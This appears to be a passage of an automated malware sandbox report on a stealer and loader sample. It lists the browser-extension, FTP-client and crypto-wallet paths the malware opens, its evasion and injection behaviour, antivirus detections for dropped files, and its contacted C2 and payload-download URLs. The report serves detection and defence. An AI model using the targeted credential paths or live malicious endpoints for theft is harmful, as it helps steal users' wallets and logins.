                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
                            Tries to harvest and steal ftp login credentials
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetter
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfo
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Roaming\FTPbox
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Roaming\FTPRush
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTP
                            Tries to steal Crypto Currency Wallets
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Roaming\Binance
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeDirectory queried: C:\Users\user\Documents
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeDirectory queried: C:\Users\user\Documents
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeDirectory queried: C:\Users\user\Documents\JSDNGYCOWY
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeDirectory queried: C:\Users\user\Documents\JSDNGYCOWY
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeDirectory queried: C:\Users\user\Documents\CURQNKVOIX
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeDirectory queried: C:\Users\user\Documents\CURQNKVOIX
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeDirectory queried: C:\Users\user\Documents\HTAGVDFUIE
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeDirectory queried: C:\Users\user\Documents\HTAGVDFUIE
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeDirectory queried: C:\Users\user\Documents\JSDNGYCOWY
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeDirectory queried: C:\Users\user\Documents\JSDNGYCOWY
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeDirectory queried: C:\Users\user\Documents\KZWFNRXYKI
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeDirectory queried: C:\Users\user\Documents\KZWFNRXYKI
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeDirectory queried: C:\Users\user\Documents\ZTGJILHXQB
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeDirectory queried: C:\Users\user\Documents\ZTGJILHXQB
                            Source: Yara matchFile source: 00000024.00000003.2786193933.0000000000BAE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000024.00000003.2879866062.0000000000B9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000024.00000003.2966933877.0000000000B9A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000024.00000003.2910972656.0000000000B9A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000024.00000003.2967091046.0000000000B9B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000024.00000003.2910429974.0000000000B9A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000024.00000003.2973122139.0000000000B9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000024.00000003.2973242098.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000024.00000003.2786126000.0000000000B97000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000024.00000003.2850001201.0000000000B97000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: cad620f7d1.exe PID: 6976, type: MEMORYSTR

                            Remote Access Functionality

                            barindex
                            Yara detected LummaC Stealer
                            Source: Yara matchFile source: Process Memory Space: cad620f7d1.exe PID: 6976, type: MEMORYSTR
                            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                            Yara detected Vidar stealer
                            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP

                            Mitre Att&ck Matrix

                            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                            Gather Victim Identity Information112
                            Scripting                            		Valid Accounts31
                            Windows Management Instrumentation                            		112
                            Scripting                            		1
                            Abuse Elevation Control Mechanism                            		1
                            Disable or Modify Tools                            		2
                            OS Credential Dumping                            		1
                            System Time Discovery                            		Remote Services11
                            Archive Collected Data                            		12
                            Ingress Tool Transfer                            		Exfiltration Over Other Network MediumAbuse Accessibility Features
                            CredentialsDomainsDefault Accounts12
                            Native API                            		1
                            DLL Side-Loading                            		1
                            DLL Side-Loading                            		111
                            Deobfuscate/Decode Files or Information                            		LSASS Memory14
                            File and Directory Discovery                            		Remote Desktop Protocol41
                            Data from Local System                            		21
                            Encrypted Channel                            		Exfiltration Over BluetoothNetwork Denial of Service
                            Email AddressesDNS ServerDomain Accounts1
                            Exploitation for Client Execution                            		1
                            Windows Service                            		1
                            Access Token Manipulation                            		1
                            Abuse Elevation Control Mechanism                            		Security Account Manager239
                            System Information Discovery                            		SMB/Windows Admin Shares1
                            Screen Capture                            		1
                            Non-Standard Port                            		Automated ExfiltrationData Encrypted for Impact
                            Employee NamesVirtual Private ServerLocal Accounts112
                            Command and Scripting Interpreter                            		11
                            Scheduled Task/Job                            		1
                            Windows Service                            		5
                            Obfuscated Files or Information                            		NTDS991
                            Security Software Discovery                            		Distributed Component Object Model2
                            Clipboard Data                            		3
                            Non-Application Layer Protocol                            		Traffic DuplicationData Destruction
                            Gather Victim Network InformationServerCloud Accounts11
                            Scheduled Task/Job                            		121
                            Registry Run Keys / Startup Folder                            		612
                            Process Injection                            		22
                            Software Packing                            		LSA Secrets12
                            Process Discovery                            		SSHKeylogging124
                            Application Layer Protocol                            		Scheduled TransferData Encrypted for Impact
                            Domain PropertiesBotnetReplication Through Removable Media2
                            PowerShell                            		RC Scripts11
                            Scheduled Task/Job                            		1
                            DLL Side-Loading                            		Cached Domain Credentials371
                            Virtualization/Sandbox Evasion                            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items121
                            Registry Run Keys / Startup Folder                            		11
                            Masquerading                            		DCSync1
                            Application Window Discovery                            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job371
                            Virtualization/Sandbox Evasion                            		Proc Filesystem11
                            Remote System Discovery                            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                            Access Token Manipulation                            		/etc/passwd and /etc/shadow1
                            System Network Configuration Discovery                            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron612
                            Process Injection                            		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                            Behavior Graph

                            Hide Legend

                            Legend:

                            • Process
                            • Signature
                            • Created File
                            • DNS/IP Info
                            • Is Dropped
                            • Is Windows Process
                            • Number of created Registry Values
                            • Number of created Files
                            • Visual Basic
                            • Delphi
                            • Java
                            • .Net C# or VB.NET
                            • C, C++ or other language
                            • Is malicious
                            • Internet
                            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1575550 Sample: file.exe Startdate: 16/12/2024 Architecture: WINDOWS Score: 100 130 woo097878781.win 2->130 132 fivegr5sb.top 2->132 134 5 other IPs or domains 2->134 158 Multi AV Scanner detection for domain / URL 2->158 160 Suricata IDS alerts for network traffic 2->160 162 Found malware configuration 2->162 164 24 other signatures 2->164 11 skotes.exe 4 59 2->11         started        16 file.exe 5 2->16         started        18 wscript.exe 2->18         started        20 Intel_PTT_EK_Recertification.exe 2->20         started        signatures3 process4 dnsIp5 148 185.215.113.43, 49758, 49764, 49782 WHOLESALECONNECTIONSNL Portugal 11->148 150 185.215.113.16 WHOLESALECONNECTIONSNL Portugal 11->150 152 31.41.244.11, 49770, 49783, 49800 AEROEXPRESS-ASRU Russian Federation 11->152 114 C:\Users\user\AppData\...\8fabf18f8e.exe, PE32 11->114 dropped 116 C:\Users\user\AppData\...\f5e7dd5dbb.exe, PE32 11->116 dropped 118 C:\Users\user\AppData\...\d0e065d272.exe, PE32 11->118 dropped 124 23 other malicious files 11->124 dropped 228 Creates multiple autostart registry keys 11->228 230 Hides threads from debuggers 11->230 232 Tries to detect sandboxes / dynamic malware analysis system (registry check) 11->232 234 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 11->234 22 sUSFJjY.exe 14 5 11->22         started        27 cad620f7d1.exe 11->27         started        29 ae91ff4264.exe 11->29         started        35 2 other processes 11->35 120 C:\Users\user\AppData\Local\...\skotes.exe, PE32 16->120 dropped 122 C:\Users\user\...\skotes.exe:Zone.Identifier, ASCII 16->122 dropped 236 Detected unpacking (changes PE section rights) 16->236 238 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 16->238 240 Tries to evade debugger and weak emulator (self modifying code) 16->240 252 2 other signatures 16->252 31 skotes.exe 16->31         started        242 Windows Scripting host queries suspicious COM object (likely to drop second stage) 18->242 244 Suspicious execution chain found 18->244 33 IsStopped.exe 18->33         started        246 Multi AV Scanner detection for dropped file 20->246 248 Injects code into the Windows Explorer (explorer.exe) 20->248 250 Modifies the context of a thread in another process (thread injection) 20->250 file6 signatures7 process8 dnsIp9 136 woo097878781.win 154.216.20.243, 443, 49776, 49828 SKHT-ASShenzhenKatherineHengTechnologyInformationCo Seychelles 22->136 106 C:\Users\user\AppData\Roaming\IsStopped.exe, PE32+ 22->106 dropped 108 C:\Users\user\AppData\...\IsStopped.vbs, ASCII 22->108 dropped 202 Antivirus detection for dropped file 22->202 204 Machine Learning detection for dropped file 22->204 206 Drops VBS files to the startup folder 22->206 220 2 other signatures 22->220 37 RegAsm.exe 22->37         started        41 powershell.exe 23 22->41         started        208 Contains functionality to inject code into remote processes 27->208 210 Injects a PE file into a foreign processes 27->210 43 cad620f7d1.exe 27->43         started        46 conhost.exe 27->46         started        110 C:\Users\user\AppData\Local\Temp\...\7z.exe, PE32+ 29->110 dropped 112 C:\Users\user\AppData\Local\Temp\...\7z.dll, PE32+ 29->112 dropped 48 cmd.exe 29->48         started        212 Multi AV Scanner detection for dropped file 31->212 214 Detected unpacking (changes PE section rights) 31->214 216 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 31->216 222 3 other signatures 31->222 224 3 other signatures 33->224 50 RegAsm.exe 33->50         started        138 fivegr5sb.top 141.8.192.141 SPRINTHOSTRU Russian Federation 35->138 140 home.fivegr5sb.top 35->140 142 httpbin.org 34.226.108.155 AMAZON-AESUS United States 35->142 218 Tries to detect sandboxes and other dynamic analysis tools (window names) 35->218 226 2 other signatures 35->226 52 conhost.exe 35->52         started        file10 signatures11 process12 dnsIp13 104 C:\Users\user\AppData\...\lkpwsyczzfuj.sys, PE32+ 37->104 dropped 166 Injects code into the Windows Explorer (explorer.exe) 37->166 168 Uses powercfg.exe to modify the power settings 37->168 170 Modifies the context of a thread in another process (thread injection) 37->170 172 Sample is not signed and drops a device driver 37->172 54 explorer.exe 37->54         started        58 powercfg.exe 37->58         started        60 powercfg.exe 37->60         started        67 2 other processes 37->67 174 Uses ping.exe to check the status of other devices and networks 41->174 176 Loading BitLocker PowerShell Module 41->176 69 2 other processes 41->69 154 drive-connect.cyou 104.21.79.7, 443, 49854 CLOUDFLARENETUS United States 43->154 178 Query firmware table information (likely to detect VMs) 43->178 180 Found many strings related to Crypto-Wallets (likely being stolen) 43->180 182 Tries to harvest and steal ftp login credentials 43->182 188 2 other signatures 43->188 184 Uses cmd line tools excessively to alter registry or file data 48->184 62 in.exe 48->62         started        65 7z.exe 48->65         started        71 10 other processes 48->71 186 Modifies power options to not sleep / hibernate 50->186 73 2 other processes 50->73 file14 signatures15 process16 dnsIp17 144 185.157.162.216, 4444, 49841 OBE-EUROPEObenetworkEuropeSE Sweden 54->144 146 37.203.243.102, 3333, 49827 DAPLDATAPLANETLtdRU Russian Federation 54->146 190 System process connects to network (likely due to code injection or exploit) 54->190 192 Query firmware table information (likely to detect VMs) 54->192 194 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 54->194 75 conhost.exe 58->75         started        77 conhost.exe 60->77         started        126 C:\Users\...\Intel_PTT_EK_Recertification.exe, PE32+ 62->126 dropped 196 Suspicious powershell command line found 62->196 198 Uses cmd line tools excessively to alter registry or file data 62->198 200 Uses schtasks.exe or at.exe to add and modify task schedules 62->200 79 powershell.exe 62->79         started        81 attrib.exe 62->81         started        83 attrib.exe 62->83         started        85 schtasks.exe 62->85         started        128 C:\Users\user\AppData\Local\Temp\...\in.exe, PE32+ 65->128 dropped 87 conhost.exe 67->87         started        89 conhost.exe 67->89         started        91 conhost.exe 73->91         started        file18 signatures19 process20 process21 93 PING.EXE 79->93         started        96 conhost.exe 79->96         started        98 conhost.exe 81->98         started        100 conhost.exe 83->100         started        102 conhost.exe 85->102         started        dnsIp22 156 127.0.0.1 unknown unknown 93->156

                            Screenshots

                            Thumbnails

                            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                            windows-stand

                            Antivirus, Machine Learning and Genetic Malware Detection

                            Initial Sample

                            SourceDetectionScannerLabelLink
                            file.exe56%VirustotalBrowse
                            file.exe47%ReversingLabsWin32.Infostealer.Tinba
                            file.exe100%AviraTR/Crypt.TPM.Gen
                            file.exe100%Joe Sandbox ML

                            Dropped Files

                            SourceDetectionScannerLabelLink
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe100%AviraTR/Crypt.XPACK.Gen
                            C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe100%AviraTR/Crypt.TPM.Gen
                            C:\Users\user\AppData\Local\Temp\1015825001\65a8a64be3.exe100%AviraHEUR/AGEN.1306956
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\sUSFJjY[1].exe100%AviraHEUR/AGEN.1304644
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe100%AviraTR/Crypt.TPM.Gen
                            C:\Users\user\AppData\Local\Temp\1015823001\e42ef86dbf.exe100%AviraTR/Crypt.TPM.Gen
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe100%AviraTR/ATRAPS.Gen
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe100%AviraHEUR/AGEN.1306956
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe100%AviraTR/Crypt.TPM.Gen
                            C:\Users\user\AppData\Local\Temp\1015828001\cf4367ad3a.exe100%AviraTR/ATRAPS.Gen
                            C:\Users\user\AppData\Local\Temp\1015824001\6351911f1d.exe100%AviraTR/Crypt.TPM.Gen
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[3].exe100%AviraTR/Crypt.XPACK.Gen
                            C:\Users\user\AppData\Local\Temp\1015830001\d0e065d272.exe100%AviraTR/Crypt.XPACK.Gen
                            C:\Users\user\AppData\Local\Temp\1015826001\84d98ae8ad.exe100%AviraTR/Crypt.XPACK.Gen
                            C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exe100%AviraHEUR/AGEN.1304644
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe100%AviraTR/Crypt.TPM.Gen
                            C:\Users\user\AppData\Local\Temp\1015827001\eb571902cc.exe100%AviraTR/Crypt.TPM.Gen
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe100%Joe Sandbox ML
                            C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe100%Joe Sandbox ML
                            C:\Users\user\AppData\Local\Temp\1015829001\8d37f89c6f.exe100%Joe Sandbox ML
                            C:\Users\user\AppData\Local\Temp\1015825001\65a8a64be3.exe100%Joe Sandbox ML
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\sUSFJjY[1].exe100%Joe Sandbox ML
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe100%Joe Sandbox ML
                            C:\Users\user\AppData\Local\Temp\1015823001\e42ef86dbf.exe100%Joe Sandbox ML
                            C:\Users\user\AppData\Local\Temp\1015832001\8fabf18f8e.exe100%Joe Sandbox ML
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe100%Joe Sandbox ML
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe100%Joe Sandbox ML
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe100%Joe Sandbox ML
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe100%Joe Sandbox ML
                            C:\Users\user\AppData\Local\Temp\1015828001\cf4367ad3a.exe100%Joe Sandbox ML
                            C:\Users\user\AppData\Local\Temp\1015824001\6351911f1d.exe100%Joe Sandbox ML
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[3].exe100%Joe Sandbox ML
                            C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exe100%Joe Sandbox ML
                            C:\Users\user\AppData\Local\Temp\1015830001\d0e065d272.exe100%Joe Sandbox ML
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[3].exe100%Joe Sandbox ML
                            C:\Users\user\AppData\Local\Temp\1015826001\84d98ae8ad.exe100%Joe Sandbox ML
                            C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exe100%Joe Sandbox ML
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe100%Joe Sandbox ML
                            C:\Users\user\AppData\Local\Temp\1015827001\eb571902cc.exe100%Joe Sandbox ML
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\sUSFJjY[1].exe5%ReversingLabs
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe83%ReversingLabsWin32.Trojan.Amadey
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[2].exe63%ReversingLabsWin32.Trojan.StealC
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe71%ReversingLabsWin32.Trojan.LummaStealer
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\XpAg0vN[1].exe3%ReversingLabs
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[3].exe54%ReversingLabsWin32.Trojan.Generic
                            C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exe5%ReversingLabs
                            C:\Users\user\AppData\Local\Temp\1015819001\XpAg0vN.exe3%ReversingLabs
                            C:\Users\user\AppData\Local\Temp\1015821001\ae91ff4264.exe83%ReversingLabsWin32.Trojan.Amadey
                            C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exe71%ReversingLabsWin32.Trojan.LummaStealer
                            C:\Users\user\AppData\Local\Temp\1015825001\65a8a64be3.exe63%ReversingLabsWin32.Trojan.StealC
                            C:\Users\user\AppData\Local\Temp\1015830001\d0e065d272.exe54%ReversingLabsWin32.Trojan.Generic
                            C:\Users\user\AppData\Local\Temp\1015831001\f5e7dd5dbb.exe83%ReversingLabsWin32.Trojan.Amadey
                            C:\Users\user\AppData\Local\Temp\1015832001\8fabf18f8e.exe71%ReversingLabsWin32.Trojan.LummaStealer
                            C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe47%ReversingLabsWin32.Infostealer.Tinba
                            C:\Users\user\AppData\Local\Temp\lkpwsyczzfuj.sys5%ReversingLabs
                            C:\Users\user\AppData\Local\Temp\main\7z.dll0%ReversingLabs
                            C:\Users\user\AppData\Local\Temp\main\7z.exe0%ReversingLabs
                            C:\Users\user\AppData\Local\Temp\main\extracted\in.exe67%ReversingLabsWin64.Trojan.Nekark
                            C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe67%ReversingLabsWin64.Trojan.Nekark
                            C:\Users\user\AppData\Roaming\IsStopped.exe5%ReversingLabs

                            Unpacked PE Files

                            No Antivirus matches

                            Domains

                            SourceDetectionScannerLabelLink
                            example.org0%VirustotalBrowse
                            pool.hashvault.pro6%VirustotalBrowse
                            ipv4only.arpa0%VirustotalBrowse

                            URLs

                            No Antivirus matches

                            Domains and IPs

                            Contacted Domains

                            NameIPActiveMaliciousAntivirus DetectionReputation
                            example.org
                            		93.184.215.14
                            		truefalse
                            ipv4only.arpa
                            		192.0.0.171
                            		truefalse
                            home.fivegr5sb.top
                            		141.8.192.141
                            		truetrue
                              www.google.com
                              		142.250.181.132
                              		truefalse
                                fivegr5sb.top
                                		141.8.192.141
                                		truetrue
                                  pool.hashvault.pro
                                  		5.188.137.200
                                  		truefalse
                                  woo097878781.win
                                  		154.216.20.243
                                  		truetrue
                                    drive-connect.cyou
                                    		104.21.79.7
                                    		truetrue
                                      httpbin.org
                                      		34.226.108.155
                                      		truefalse

                                        Contacted URLs

                                        NameMaliciousAntivirus DetectionReputation
                                        http://fivegr5sb.top/v1/upload.phptrue
                                          http://185.215.113.16/mine/random.exefalse
                                            http://31.41.244.11/files/fate/random.exefalse
                                              https://drive-connect.cyou/apitrue
                                                http://185.215.113.43/Zu7JuNko/index.phptrue
                                                  https://woo097878781.win/P.txttrue
                                                    http://home.fivegr5sb.top/kJZQfgRLErzqwUgdaDCN1734167391?argument=NqSXGMT29bBsoKvm1734307336true
                                                      https://woo097878781.win/77/uploads/Odavmyskfc.pdftrue
                                                        https://woo097878781.win/66/api/endpoint.phptrue
                                                          https://httpbin.org/ipfalse
                                                            http://31.41.244.11/files/burpin1/random.exefalse
                                                              http://home.fivegr5sb.top/kJZQfgRLErzqwUgdaDCN1734167391true

                                                                URLs from Memory and Binaries

                                                                NameSourceMaliciousAntivirus DetectionReputation
                                                                https://duckduckgo.com/chrome_newtabcad620f7d1.exe, 00000024.00000003.2787056296.000000000321F000.00000004.00000800.00020000.00000000.sdmp, cad620f7d1.exe, 00000024.00000003.2787334599.0000000003208000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  https://duckduckgo.com/ac/?q=cad620f7d1.exe, 00000024.00000003.2787056296.000000000321F000.00000004.00000800.00020000.00000000.sdmp, cad620f7d1.exe, 00000024.00000003.2787334599.0000000003208000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    https://github.com/mgravell/protobuf-netJsUSFJjY.exe, 00000006.00000002.2656456541.0000026961215000.00000004.00000800.00020000.00000000.sdmp, sUSFJjY.exe, 00000006.00000002.2618401542.000002694F270000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                      http://www.micom/pkiops/Docs/ry.htm0powershell.exe, 0000000A.00000002.2601597145.00000190F5F88000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        https://contoso.com/Licensepowershell.exe, 0000000A.00000002.2587367775.00000190EDCBD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.cad620f7d1.exe, 00000024.00000003.2937546058.0000000000BC4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            https://woo097878781.wincajexplorer.exe, 00000017.00000003.2640946465.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2640900823.0000000000887000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=cad620f7d1.exe, 00000024.00000003.2787056296.000000000321F000.00000004.00000800.00020000.00000000.sdmp, cad620f7d1.exe, 00000024.00000003.2787334599.0000000003208000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17cad620f7d1.exe, 00000024.00000003.2797139581.000000000324C000.00000004.00000800.00020000.00000000.sdmp, cad620f7d1.exe, 00000024.00000003.2849928748.0000000003245000.00000004.00000800.00020000.00000000.sdmp, cad620f7d1.exe, 00000024.00000003.2838150959.0000000003245000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  https://woo097878781.winsUSFJjY.exe, 00000006.00000002.2619824711.0000026950C31000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2640946465.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2640900823.0000000000887000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    https://woo097878781.win/P.txtIexplorer.exe, 00000017.00000003.2664467654.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3848708673.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2640946465.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2640900823.0000000000887000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      https://drive-connect.cyou/38cad620f7d1.exe, 00000024.00000003.3014208092.0000000000B9D000.00000004.00000020.00020000.00000000.sdmp, cad620f7d1.exe, 00000024.00000002.3122773825.0000000000B9E000.00000004.00000020.00020000.00000000.sdmp, cad620f7d1.exe, 00000024.00000003.3053058436.0000000000B9E000.00000004.00000020.00020000.00000000.sdmp, cad620f7d1.exe, 00000024.00000003.3054039751.0000000000B98000.00000004.00000020.00020000.00000000.sdmp, cad620f7d1.exe, 00000024.00000003.3036675220.0000000000B9E000.00000004.00000020.00020000.00000000.sdmpfalse
